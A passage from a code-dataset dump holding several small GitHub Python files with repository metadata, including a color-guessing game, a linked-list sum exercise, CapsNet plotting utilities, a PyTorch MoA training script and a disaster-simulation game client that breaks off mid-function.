Type again...\\n\")\n return False\n return True\n\n\ndef compare_colors(passcode, color_input, count):\n \"\"\"\n Compares the actual color code with user's guess to\n give clue to the user\n \"\"\"\n hit = 0\n miss = 0\n\n for color in color_input:\n if color in passcode:\n if color_input.index(color) == passcode.index(color):\n hit += 1\n else:\n miss += 1\n list_new = [hit, miss]\n clue[count] = list_new\n\n\ndef options_choice():\n \"\"\"\n Gives game level options to the user to choose\n \"\"\"\n welcome_banner()\n print(\"-\" * 20)\n print(\"Choose difficulty:\")\n print(\"-\" * 20)\n print()\n print(\"1 - \", end=\"\")\n print(Fore.YELLOW + \"Easy\" + Fore.RESET)\n print(\"2 - \", end=\"\")\n print(Fore.BLUE + \"Medium\" + Fore.RESET)\n print(\"3 - \", end=\"\")\n print(Fore.RED + \"Difficult\" + Fore.RESET)\n print(\"4 - \", end=\"\")\n print(Fore.MAGENTA + \"Scoreboard\" + Fore.RESET)\n print(\"5 - \", end=\"\")\n print(Fore.GREEN + \"Exit Game\" + Fore.RESET)\n\n print(\"Enter your choice by pressing '1', '2', '3' ,'4' or '5':\")\n while True:\n key = input('\\n')\n if key in ['1', '2', '3', '4', '5']:\n break\n else:\n print(\"Invalid input, choose again!\")\n if (int(key) == 4):\n leaderboard()\n return 0\n if (int(key) == 5):\n sys.exit(0)\n clear_screen()\n return int(key)\n\n\ndef main():\n \"\"\"\n Main function to start the game\n \"\"\"\n clear_screen()\n reset_variables()\n choice = options_choice()\n color_passcode = create_color_code(color_list, choice)\n guess_attempts(attempts, unknown, color_passcode, choice)\n\n\ndef welcome():\n \"\"\"\n Welcome function to display welcome heading and instruction\n \"\"\"\n welcome_banner()\n\n if player_namef():\n clear_screen()\n welcome_banner()\n print(\"\\n\")\n pname = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + pname.format('welcome ' + player_name + '!!!')\n + Fore.RESET)\n print()\n print(\"*\" * 80)\n print()\n while True:\n print(\"Press 'I' or 'i' for Instructions.\")\n print(\"Press 'M' or 'm' for Game menu.\")\n rkey = input('\\n')\n if rkey.upper() == 'I':\n clear_screen()\n print(\"\"\"\nYou have to crack the color code in as few attempts\nas possible. There are total of 8 attempts.\nThe color code will be consisting of either 3, 4, or\\\n5 colors , depending on the difficulty\nof the game you choose (Easy, Medium or Difficult).\n\nEasy : Green White Yellow\nMedium: White Yellow Red Blue\nDifficult: Green White Red Purple Blue\n\nYou will be asked to enter your color code guess.\nYou will be told how close you are if you don't get the exact code\n\nHit -> If you get a right color on exact position\nMiss-> If you get the right color but on different position\n\nIf you get the color code exactly right you have won the game.\nGOOD LUCK !!! \"\"\")\n print()\n break\n elif rkey.upper() == 'M':\n main()\n else:\n print(\"Invalid input! 
Try again\")\n continue_to_main()\n\n\nwelcome()\n","repo_name":"Sadaf-Tariq/pp3-color-code-breaker","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":12647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"24887668550","text":"import sys\nimport numpy as np\n# np.set_printoptions(threshold=sys.maxsize)\nnp.set_printoptions(suppress=True)\n\n\narr = np.array([3, 4, 21, 36, 10, 28, 35, 5, 24, 42])\n\n# print(type(arr))\nmaxIt = np.where(arr == np.amax(arr))\n\n# print(maxIt[0])\n\nres = ' '.join(map(str, maxIt[0]))\nprint(res)\n\n\n\n","repo_name":"ybgirgin3/hackerrank-solutions","sub_path":"Algorithm_w_Python/breakingRecords/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
{"seq_id":"703982098","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\nimport math\n\ndef plot_log(filename, show=True):\n # load data\n keys = []\n values = []\n with open(filename, 'r') as f:\n reader = csv.DictReader(f)\n for row in reader:\n if keys == []:\n for key, value in row.items():\n keys.append(key)\n values.append(float(value))\n continue\n\n for _, value in row.items():\n values.append(float(value))\n\n values = np.reshape(values, newshape=(-1, len(keys)))\n values[:,0] += 1\n\n fig = plt.figure(figsize=(4,6))\n fig.subplots_adjust(top=0.95, bottom=0.05, right=0.95)\n fig.add_subplot(211)\n for i, key in enumerate(keys):\n if key.find('loss') >= 0 and not key.find('val') >= 0: # training loss\n plt.plot(values[:, 0], values[:, i], label=key)\n plt.legend()\n plt.title('Training loss')\n\n fig.add_subplot(212)\n for i, key in enumerate(keys):\n if key.find('acc') >= 0: # acc\n plt.plot(values[:, 0], values[:, i], label=key)\n plt.legend()\n plt.title('Training and validation accuracy')\n\n # fig.savefig('result/log.png')\n if show:\n plt.show()\n\n\ndef combine_images(generated_images):\n num = generated_images.shape[0]\n width = int(math.sqrt(num))\n height = int(math.ceil(float(num)/width))\n shape = generated_images.shape[1:3]\n image = np.zeros((height*shape[0], width*shape[1]),\n dtype=generated_images.dtype)\n for index, img in enumerate(generated_images):\n i = int(index/width)\n j = index % width\n image[i*shape[0]:(i+1)*shape[0], j*shape[1]:(j+1)*shape[1]] = \\\n img[:, :, 0]\n return image\n\nif __name__==\"__main__\":\n plot_log('result/log.csv')","repo_name":"TarrySingh/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials","sub_path":"deep-learning/CapsNET/Keras_Implementation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":3543,"dataset":"github-code","pt":"43"}
{"seq_id":"30249981772","text":"# -*- coding: utf-8 -*-\r\n###########################################\r\n# Author:FeatherMountain(https://3wa.tw) #\r\n# Version: 0.1_Custom #\r\n# Date: 2022-12-02 #\r\n# License: MIT #\r\n###########################################\r\n# # how to :\r\n# import myi18n\r\n# i18n = myi18n.kit()\r\n# i18n.auto(str) \r\n# auto-detect via locale.getpreferredencoding()\r\n# if it is not cp950, switch to the English version\r\nimport locale\r\nclass kit: \r\n LOCALE_ENCODING = ''\r\n def __init__(self):\r\n self.LOCALE_ENCODING = locale.getpreferredencoding() \r\n #print \"myi18n __init__\"\r\n #print self.LOCALE_ENCODING # this is normally cp950\r\n pass\r\n def auto(self,s):\r\n if self.LOCALE_ENCODING == \"cp950\" or 
self.LOCALE_ENCODING == \"950\":\r\n return s\r\n if self.data.has_key(s):\r\n return self.data[s]\r\n else:\r\n return s\r\n data = {\r\n \"打字音啟動\":\"Enable Typing Sound\",\r\n \"正常出字模式\":\"Normal Mode\",\r\n \"BIG5模式\":\"BIG5 Mode\",\r\n \"複製貼上模式\":\"Copy/Paste Mode\",\r\n \"1.關於肥米輸入法\":\"1. About UCLLIU Input Method\",\r\n \"2.切換至「遊戲模式」\":\"2. Switch to \\\"Game Mode\\\"\",\r\n \"2.切換至「正常模式」\":\"2. Switch to \\\"Normal Mode\\\"\", \r\n \"3.選擇出字模式\":\"3. Sendkeys Mode\",\r\n \"【●】短版模式\":\"[ o ] UI/UX Short\",\r\n \"【 】短版模式\":\"[ ] UI/UX Short\",\r\n \"【,,,+】畫面加大\":\"[ ,,,+ ] UI/UX Increase\",\r\n \"【,,,-】畫面縮小\":\"[ ,,,- ] UI/UX Minify\",\r\n \"英數時透明度\":\"En Mode Transparency\",\r\n \"肥模式透明度\":\"UCL Mode Transparency\",\r\n \"4.畫面調整\":\"4. UI Adjustment\",\r\n \"5.【●】使用 CTRL+SPACE 切換輸入法\":\"5. [ o ] Switch Input Method By CTRL+SPACE\",\r\n \"5.【 】使用 CTRL+SPACE 切換輸入法\":\"5. [ ] Switch Input Method By CTRL+SPACE\",\r\n \"6.【●】顯示短根\":\"6. [ o ] Diplay [SP] Shortest Character\",\r\n \"6.【 】顯示短根\":\"6. [ ] Diplay [SP] Shortest Character\",\r\n \"7.【●】顯示提示注音\":\"7. [ o ] Diplay [Prompt phonetic]\",\r\n \"7.【 】顯示提示注音\":\"6. [ ] Diplay [Prompt phonetic]\",\r\n \"】\":\" ]\",\r\n \"【\":\"[ \",\r\n \"●\":\"o\",\r\n \" \":\" \",\r\n \"8.打字音\":\"8. Typing sound\",\r\n \"肥米輸入法:\":\"UCLLIU Input Method: \",\r\n \"9.【●】啟動預設為「肥」模式\":\"9. [ o ] Boot default to \\\"UCL\\\" mode\",\r\n \"9.【 】啟動預設為「肥」模式\":\"9. [ ] Boot default to \\\"UCL\\\" mode\",\r\n \"10. 離開(Quit)\":\"9. Quit\" \r\n }","repo_name":"shadowjohn/UCL_LIU","sub_path":"myi18n.py","file_name":"myi18n.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"43"} +{"seq_id":"32118251323","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nimport networkx as nx\n\nfrom mapping import *\n\n# reference: GenMap ConfDrawer.py\n# https://github.com/hal-lab-u-tokyo/GenMap/blob/master/ConfDrawer.py\n\n# drawing setting\npe_margin = 0.15\npe_color = \"skyblue\"\nalu_scale = 0.3\nalu_color = \"lightcoral\"\npe_size = 1 - pe_margin * 2\narrow_setting = dict(facecolor='black', width=0.8,\n headwidth=4.0, headlength=4.0, shrink=0.01)\n\n\nclass Visualizer():\n @staticmethod\n def visualize_mapping(mapping: Mapping, output_dir: str):\n fig = plt.figure(figsize=(mapping.column_num *\n mapping.context_size, mapping.row_num))\n\n for context_id in range(mapping.context_size):\n Visualizer.visualize_mapping_one_context(mapping, context_id, fig)\n\n plt.savefig(output_dir + \"/result.png\")\n\n @staticmethod\n def visualize_mapping_one_context(mapping: Mapping, context_id: int, fig):\n ax = fig.add_subplot(1, mapping.context_size, context_id + 1)\n ax.set_xbound(0, mapping.column_num)\n ax.set_ybound(0, mapping.row_num)\n plt.tick_params(labelbottom=False, labelleft=False, labelright=False,\n labeltop=False, bottom=False, left=False, right=False, top=False)\n\n row_num = mapping.row_num\n column_num = mapping.column_num\n\n def create_PE_id(column_id, row_id):\n return column_id * 100 + row_id\n\n def create_xy_from_row_id_and_column_id(row_id, column_id, row_num):\n return (column_id, row_num - 1 - row_id)\n\n PE_id_to_patch = {}\n\n for row_id in range(row_num):\n for column_id in range(column_num):\n tmp_PE_config = mapping.PE_array[row_id][column_id].config_list[context_id]\n\n x, y = create_xy_from_row_id_and_column_id(row_id, column_id, row_num)\n\n # add PE and opcode\n PE_operation_type = tmp_PE_config.operation_type\n if PE_operation_type != 
OperationType.Nop:\n color = pe_color\n op_name = tmp_PE_config.operation_name\n ax.annotate(op_name, xy=(x + 1 - pe_margin * 3,\n y + 1 - pe_margin * 2), size=12)\n else:\n color = \"white\"\n pe = Visualizer.__make_PE_patch((x, y), color)\n ax.add_patch(pe)\n\n # add ALU\n alu = Visualizer.__make_ALU_patch((x, y))\n ax.add_patch(alu)\n\n PE_id = create_PE_id(row_id, column_id)\n PE_id_to_patch[PE_id] = alu\n\n for row_id in range(row_num):\n for column_id in range(column_num):\n x, y = create_xy_from_row_id_and_column_id(row_id, column_id, row_num)\n tmp_PE_id = create_PE_id(row_id, column_id)\n tmp_PE_patch = PE_id_to_patch[tmp_PE_id]\n tmp_PE_config = mapping.PE_array[row_id][column_id].config_list[context_id]\n\n for from_config_id in tmp_PE_config.from_config_id:\n from_PE_id = create_PE_id(\n from_config_id.row_id, from_config_id.column_id)\n from_PE_patch = PE_id_to_patch[from_PE_id]\n ax.annotate(\"\", xy=Visualizer.__get_center(tmp_PE_patch),\n xytext=Visualizer.__get_center(from_PE_patch),\n arrowprops=arrow_setting)\n\n @staticmethod\n def __make_PE_patch(coord, color):\n \"\"\"Makes a square for PE\n Args:\n coord (tuple): coordinate of the PE\n color (str): color of the PE\n Returns:\n patch of matplotlib: a square\n \"\"\"\n x, y = coord\n return pat.Rectangle(xy=(x + pe_margin, y + pe_margin),\n width=pe_size, height=pe_size,\n angle=0, facecolor=color, edgecolor=\"black\")\n\n @staticmethod\n def __make_ALU_patch(coord):\n \"\"\"Makes a patch for ALU\n Args:\n coord (tuple): coordinate of the PE\n Returns:\n patch of matplotlib: an ALU\n \"\"\"\n pos = (coord[0] + 0.5, coord[1] + 0.4)\n x = [0.0, 0.4, 0.5, 0.6, 1.0, 0.8, 0.2]\n y = [0.0, 0.0, 0.2, 0.0, 0.0, 0.7, 0.7, 0.0]\n\n x = [v * alu_scale + pos[0] for v in x]\n y = [v * alu_scale + pos[1] for v in y]\n\n return pat.Polygon(xy=list(zip(x, y)), color=alu_color)\n\n @staticmethod\n def __get_center(patch):\n \"\"\"Calculates center coordinate of patch\n \"\"\"\n if isinstance(patch, plt.Rectangle):\n width = patch.get_width()\n height = patch.get_height()\n x = patch.get_x()\n y = patch.get_y()\n return (x + width / 2, y + height / 2)\n elif isinstance(patch, pat.RegularPolygon):\n return patch.xy\n else:\n xy = patch.get_xy()\n x_list = [x for x, y in xy]\n y_list = [y for x, y in xy]\n min_x = min(x_list)\n max_x = max(x_list)\n min_y = min(y_list)\n max_y = max(y_list)\n return (min_x + (max_x - min_x) / 2, min_y + (max_y - min_y) / 2)\n","repo_name":"hal-lab-u-tokyo/elastic_cgra_mapper","sub_path":"visualizer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40378722073","text":"#\n\"\"\"\nTextVectorizer\n\nJust like TFIDFVectorizer\n\"\"\"\n\nfrom copy import deepcopy\nfrom collections import Counter\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom tqdm import tqdm\n\n\nPAD = '<PAD>'\nSOS = '<SOS>'\nEOS = '<EOS>'\nUNK = '<UNK>'\n\n\nclass TextVectorizer(BaseEstimator):\n \"\"\"\n https://scikit-learn.org/stable/modules/generated/sklearn.base.BaseEstimator.html#sklearn.base.BaseEstimator\n \"\"\"\n\n def __init__(self, **param):\n self.word2ind = {}\n self.ind2word = {\n 0: PAD,\n 1: SOS,\n 2: EOS,\n 3: UNK,\n }\n self.length = len(self.ind2word)\n self.set_params(**param)\n\n def get_params(self, deep=False):\n if deep:\n return deepcopy(self.params)\n return self.params\n\n def set_params(self, **params):\n self.params = {\n 'verbose': 0,\n 'max_len': None,\n 'max_features': 
None,\n }\n for k in params:\n self.params[k] = params[k]\n\n def fit(self, raw_documents, y=None):\n max_features = self.params.get('max_features', None)\n verbose = self.params.get('verbose', 0)\n if verbose:\n raw_documents = tqdm(raw_documents)\n counter = Counter()\n for doc in raw_documents:\n counter.update([\n word for word in doc.split(' ')\n if word\n ])\n if isinstance(max_features, int):\n counter = counter.most_common(max_features)\n else:\n counter = list(counter.items())\n for word, _ in counter:\n self.word2ind[word] = self.length\n self.ind2word[self.length] = word\n self.length += 1\n\n def fit_transform(self, raw_documents, y=None):\n self.fit(raw_documents)\n return self.transform(raw_documents)\n\n def __len__(self):\n return self.length\n\n def transform(self, raw_documents, copy=False):\n verbose = self.params.get('verbose', 0)\n gen = self.transform_generator(\n raw_documents, batch_size=1, forever=False)\n if verbose:\n gen = tqdm(gen)\n ret = []\n for x in gen:\n ret.append(x[0])\n return np.array(ret)\n\n def transform_generator(self, raw_documents, batch_size=32, forever=True):\n max_len = self.params.get('max_len', None)\n batch = []\n while True:\n for doc in raw_documents:\n sent = []\n for word in doc.split(' '):\n if word:\n if word in self.word2ind:\n sent.append(self.word2ind[word])\n else:\n sent.append(3)\n if max_len and len(sent) < max_len:\n sent += [0] * (max_len - len(sent))\n batch.append(np.array(sent))\n if len(batch) >= batch_size:\n yield np.array(batch)\n batch = []\n if not forever:\n break\n\n def inverse_transform(self, X):\n ret = []\n for x in X:\n sent = []\n for xx in x:\n if xx > 0 and xx in self.ind2word:\n sent.append(self.ind2word[xx])\n ret.append(sent)\n return ret\n\n\nif __name__ == '__main__':\n docs = [\n 'I love you',\n 'I hate you very much',\n 'I need you',\n ]\n tv = TextVectorizer()\n tv.fit(docs)\n embs = tv.transform(docs)\n print(embs)\n iembs = tv.inverse_transform(embs)\n print(iembs)\n\n tv = TextVectorizer(verbose=1, max_len=5)\n tv.fit(docs)\n embs = tv.transform(docs)\n print(embs)\n iembs = tv.inverse_transform(embs)\n print(iembs)\n\n tv = TextVectorizer(verbose=1, max_len=5, max_features=2)\n tv.fit(docs)\n\n for i, x in enumerate(tv.transform_generator(docs, batch_size=2)):\n print(x)\n if i >= 2:\n break\n","repo_name":"deepdialog/text-vectorizer","sub_path":"text_vectorizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22679622368","text":"#Sum List\r\nclass ListNode(object):\r\n def __init__(self, x):\r\n self.data = x\r\n self.next = None\r\n\r\n def print_list(self):\r\n curr = self\r\n s = \"\"\r\n while curr is not None:\r\n s += str(curr.data) + \"-> \"\r\n curr = curr.next\r\n print(s)\r\n\r\ndef sum_list(l1, l2):\r\n place = 0\r\n carry = 0\r\n c1 = l1\r\n c2 = l2\r\n total = 0\r\n while c1 is not None or c2 is not None:\r\n temp = 0\r\n if c1 is not None:\r\n temp += c1.data\r\n c1 = c1.next\r\n if c2 is not None:\r\n temp += c2.data\r\n c2 = c2.next\r\n if carry == 1:\r\n temp += carry\r\n carry = 0\r\n\r\n if temp >= 10:\r\n temp -= 10\r\n carry = 1\r\n total += temp*(10**place)\r\n place += 1\r\n\r\n total += carry*(10**place)\r\n \r\n return total\r\n\r\nl1 = ListNode(9)\r\nl1.next = ListNode(9)\r\nl1.next.next = ListNode(9)\r\n\r\nl2 = ListNode(1)\r\n\r\nprint(sum_list(l1, 
l2))\r\n","repo_name":"shlokKh/interview-practice","sub_path":"chapter2/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15681474390","text":"\"\"\"aggregate two logs `data1` and `data2` and log to tensorboard\"\"\"\n\nimport sys;\n\nsys.path.append(\"../../\")\n\nfrom booster import Aggregator, Diagnostic\nfrom torch.utils.tensorboard import SummaryWriter\nfrom booster.utils import logging_sep\n\n# create data\ndata1 = {'loss': {'nll': 0.1, 'kl': 0.5}, 'other': {'ex1': 0.3}}\ndata2 = {'loss': {'nll': 0.3, 'kl': 0.7}, 'other': {'ex1': 0.5}}\n\n# create a diagnostic object for data1\ndiag1 = Diagnostic(data1)\n\n# create a diagnostic object for data2\ndiag2 = Diagnostic()\ndiag2.update(data2)\n\n# create an aggregator\nagg = Aggregator()\n\n# leaf average of diag1 and diag2\nagg.update(diag1)\nagg.update(diag2)\n\n# return moving average and move to CPU\nsummary = agg.data.to('cpu')\n\n# print resulting summary\nprint(logging_sep())\nprint(summary)\nprint(logging_sep())\n\n# log to tensorboard\nwriter = SummaryWriter(log_dir=\"../../tensorboard\")\nsummary.log(writer, 1)\n","repo_name":"vlievin/booster-pytorch","sub_path":"examples/datastruct/scalars.py","file_name":"scalars.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25283507394","text":"def check(s):\n st = list()\n for i in s:\n if i.lower() not in st and i.isalpha():\n st.append(i.lower())\n #print(st)\n return len(st)==26\nn = input()\nif check(n):\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"snaprick/PP2_20BD","sub_path":"TSIS6/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16690531084","text":"\"\"\"\nScript for training a model for the Mechanisms of Action (MoA) prediction task.\nThis script uses a simple feed-forward neural network model, PyTorch as the backend, and cross-validation for better model performance.\n\"\"\"\nimport json\nimport click\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport logging\nfrom typing import Dict, List\nfrom torch.utils.tensorboard import SummaryWriter\n\n# setting up logs\nlogging.basicConfig(level=logging.INFO)\nwriter = SummaryWriter(\"logs\")\n\n# Define constants\nINPUT_PATH = \"data/processed\"\nOUTPUT_PATH = \"models\"\nBATCH_SIZE = 64\nLR = 0.001\nN_EPOCHS = 2\nFOLDS = [0, 1, 2, 3, 4] # Folds to use for cross-validation\nMODEL_CONFIG = {\"layer1_size\": 1024, \"layer2_size\": 2048}\n\n\ndef prepare_data(input_path: Path, fold_id: int):\n train_df: pd.DataFrame = pd.read_csv(input_path / f\"train_fold{fold_id}.csv\")\n valid_df: pd.DataFrame = pd.read_csv(input_path / f\"valid_fold{fold_id}.csv\")\n\n # Drop column 1 which only has \"trt_cp\" values\n train_df = train_df.drop(columns=train_df.columns[1])\n valid_df = valid_df.drop(columns=valid_df.columns[1])\n\n # Separate features and targets\n train_features: np.ndarray = train_df.iloc[:, 1:875].values\n train_targets: np.ndarray = train_df.iloc[:, 875:].values\n\n valid_features: np.ndarray = valid_df.iloc[:, 1:875].values\n valid_targets: 
np.ndarray = valid_df.iloc[:, 875:].values\n\n return train_features, train_targets, valid_features, valid_targets\n\n\nclass MoaDataset(Dataset):\n def __init__(self, features: np.array, targets: np.array):\n self.features = features\n self.targets = targets\n\n def __len__(self) -> int:\n return self.features.shape[0]\n\n def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:\n dct = {\n \"x\": torch.tensor(self.features[idx, :], dtype=torch.float),\n \"y\": torch.tensor(self.targets[idx, :], dtype=torch.float),\n }\n return dct\n\n\nclass MoaModel(nn.Module):\n def __init__(\n self, num_features: int, num_targets: int, layer1_size: int, layer2_size: int\n ):\n super(MoaModel, self).__init__()\n self.layer1 = nn.Linear(num_features, layer1_size)\n self.layer2 = nn.Linear(layer1_size, layer2_size)\n self.layer3 = nn.Linear(layer2_size, num_targets)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n x = F.relu(self.layer1(inputs))\n x = F.relu(self.layer2(x))\n x = self.layer3(x)\n return x\n\n\n# ResNet model\nclass ResBlock(nn.Module):\n def __init__(\n self, in_features: int, out_features: int, dropout_rate: float = 0.0\n ) -> None:\n super(ResBlock, self).__init__()\n self.lin1 = nn.Linear(in_features, out_features)\n self.lin2 = nn.Linear(out_features, in_features)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n residual = x\n out = F.relu(self.lin1(x))\n out = self.dropout(out)\n out = self.lin2(out)\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_features: int, num_targets: int, layer_sizes: List[int]):\n super(ResNet, self).__init__()\n layers = []\n layers.append(nn.Linear(num_features, layer_sizes[0]))\n for i in range(len(layer_sizes) - 1):\n layers.append(ResBlock(layer_sizes[i], layer_sizes[i + 1]))\n layers.append(nn.Linear(layer_sizes[-1], num_targets))\n self.model = nn.Sequential(*layers)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return self.model(x)\n\n\ndef train_model(\n model: nn.Module,\n dataloader: DataLoader,\n criterion: nn.Module,\n optimizer: optim.Optimizer,\n device: torch.device,\n) -> float:\n model.train()\n total_loss = 0\n\n for data in dataloader:\n optimizer.zero_grad()\n inputs = data[\"x\"].to(device)\n targets = data[\"y\"].to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n total_loss += loss.item() * inputs.size(0)\n\n epoch_loss = total_loss / len(dataloader.dataset)\n return epoch_loss\n\n\ndef evaluate_model(\n model: nn.Module, dataloader: DataLoader, criterion: nn.Module, device: torch.device\n) -> float:\n model.eval()\n total_loss = 0\n\n for data in dataloader:\n inputs = data[\"x\"].to(device)\n targets = data[\"y\"].to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n total_loss += loss.item() * inputs.size(0)\n\n epoch_loss = total_loss / len(dataloader.dataset)\n return epoch_loss\n\n\ndef run_training(\n model: nn.Module,\n train_dataloader: DataLoader,\n valid_dataloader: DataLoader,\n criterion: nn.Module,\n optimizer: optim.Optimizer,\n device: torch.device,\n num_epochs: int,\n model_path: str,\n):\n best_valid_loss = float(\"inf\")\n scheduler = ReduceLROnPlateau(optimizer, \"min\", patience=3, factor=0.1)\n\n for epoch in range(num_epochs):\n train_loss = train_model(model, train_dataloader, criterion, optimizer, device)\n valid_loss = evaluate_model(model, valid_dataloader, criterion, device)\n logging.info(\n f\"Epoch 
{epoch+1} / {num_epochs} - Train Loss: {train_loss} - Valid Loss: {valid_loss}\"\n )\n\n # Write to tensorboard\n writer.add_scalars(\"Loss\", {\"train\": train_loss, \"valid\": valid_loss}, epoch)\n\n # learning rate scheduler\n scheduler.step(valid_loss)\n\n # Save model parameters if validation loss improved\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(\n {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": valid_loss,\n },\n model_path,\n )\n logging.info(\n f\"Saved model parameters to {model_path}. Validation loss: {valid_loss}\"\n )\n\n\ndef make_model(\n model_name: str, num_features: int, num_targets: int, model_config: Dict\n):\n if model_name == \"MoaModel\":\n model = MoaModel(\n num_features,\n num_targets,\n model_config[\"layer1_size\"],\n model_config[\"layer2_size\"],\n )\n elif model_name == \"ResNet\":\n model = ResNet(num_features, num_targets, model_config[\"layer_sizes\"])\n else:\n raise Exception(f\"Unknown model: {model_name}\")\n return model\n\n\n@click.command()\n@click.option(\n \"--model_name\", type=click.Choice([\"MoaModel\", \"ResNet\"], case_sensitive=False)\n)\n@click.option(\"--config\", type=click.Path(exists=True))\ndef main(model_name: str, config: str):\n for fold_id in FOLDS:\n train_features, train_targets, valid_features, valid_targets = prepare_data(\n Path(INPUT_PATH), fold_id\n )\n\n # Now use this data with the Dataset, Dataloader and Model\n train_dataset = MoaDataset(train_features, train_targets)\n valid_dataset = MoaDataset(valid_features, valid_targets)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n num_features = train_features.shape[1]\n num_targets = train_targets.shape[1]\n # print(f\"Number of features: {num_features}\")\n # print(f\"Number of targets: {num_targets}\")\n\n # Load model configuration\n with open(config, \"r\") as f:\n model_config = json.load(f)\n\n model = make_model(model_name, num_features, num_targets, model_config)\n model.to(device)\n\n train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n valid_dataloader = DataLoader(valid_dataset, batch_size=64, shuffle=False)\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n run_training(\n model,\n train_dataloader,\n valid_dataloader,\n criterion,\n optimizer,\n device,\n num_epochs=N_EPOCHS,\n model_path=f\"{OUTPUT_PATH}/{model_name}_fold{fold_id}.pth\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oleksandrsirenko/mechanisms-of-action-moa-prediction","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"16156966855","text":"from game.client.user_client import UserClient\nfrom game.common.enums import *\n\n\nclass Client(UserClient):\n # Variables and info you want to save between turns go here\n def __init__(self):\n super().__init__()\n self.number = 100\n self.SENSOR_DECREE_MAPPINGS = {\n SensorType.fire: DecreeType.anti_fire_dogs,\n SensorType.tornado: DecreeType.paperweights,\n SensorType.blizzard: DecreeType.snow_shovels,\n SensorType.earthquake: DecreeType.rubber_boots,\n SensorType.monster: DecreeType.fishing_hook,\n SensorType.ufo: DecreeType.cheese\n }\n\n self.other_sensor_mappings = {\n DisasterType.fire: SensorType.fire,\n DisasterType.tornado: SensorType.tornado,\n 
DisasterType.blizzard: SensorType.blizzard,\n DisasterType.earthquake: SensorType.earthquake,\n DisasterType.monster: SensorType.monster,\n DisasterType.ufo: SensorType.ufo\n }\n\n self.lasting_disasters = [DisasterType.fire, DisasterType.blizzard, DisasterType.monster]\n\n def team_name(self):\n return \"Scummy Fungus\"\n\n def city_name(self):\n return \"Bingy Spingus\"\n\n def city_type(self):\n return CityType.invested\n\n # This is where your AI will decide what to do\n def take_turn(self, turn, actions, city, disasters):\n self.print('New Turn')\n # Set decree to highest rate\n highest = -1\n highest_sensor = city.sensors[SensorType.fire]\n for sensor in city.sensors.values():\n if sensor.sensor_results > highest:\n highest = sensor.sensor_results\n highest_sensor = sensor\n\n corresponding_decree = self.SENSOR_DECREE_MAPPINGS[highest_sensor.sensor_type]\n actions.set_decree(corresponding_decree)\n\n current_lasting_disasters = [x for x in disasters if x.type in self.lasting_disasters]\n\n total_effort_spent = 0\n things_done = list()\n while total_effort_spent < city.population:\n effort_remaining = city.population - total_effort_spent\n self.print(f'Spent: {total_effort_spent} | Remaining: {effort_remaining} | Total: {city.population}')\n\n effort_spent = 0\n act = None\n\n # Allocate effort to repairing the city structure\n if city.structure < city.max_structure and ActionType.repair_structure not in things_done:\n self.print('Fixing structure')\n difference = city.max_structure - city.structure\n effort_spent = min(4 * difference, effort_remaining)\n act = ActionType.repair_structure\n\n # Allocate effort to recovering population\n elif city.population < city.max_structure and ActionType.regain_population not in things_done:\n self.print('Recovering population')\n difference = city.max_structure - city.population\n effort_spent = min(4 * difference, effort_remaining)\n act = ActionType.regain_population\n\n # Allocate effort to disasters\n elif len(current_lasting_disasters) > 0:\n self.print('Getting rid of disaster')\n disaster = None\n threat_score = -float('INF')\n for d in current_lasting_disasters:\n ts = d.effort_remaining * (1 / (d.population_damage + d.structure_damage))\n if ts >= threat_score:\n disaster = d\n threat_score = ts\n\n if disaster is not None:\n effort_spent = min(disaster.effort_remaining, 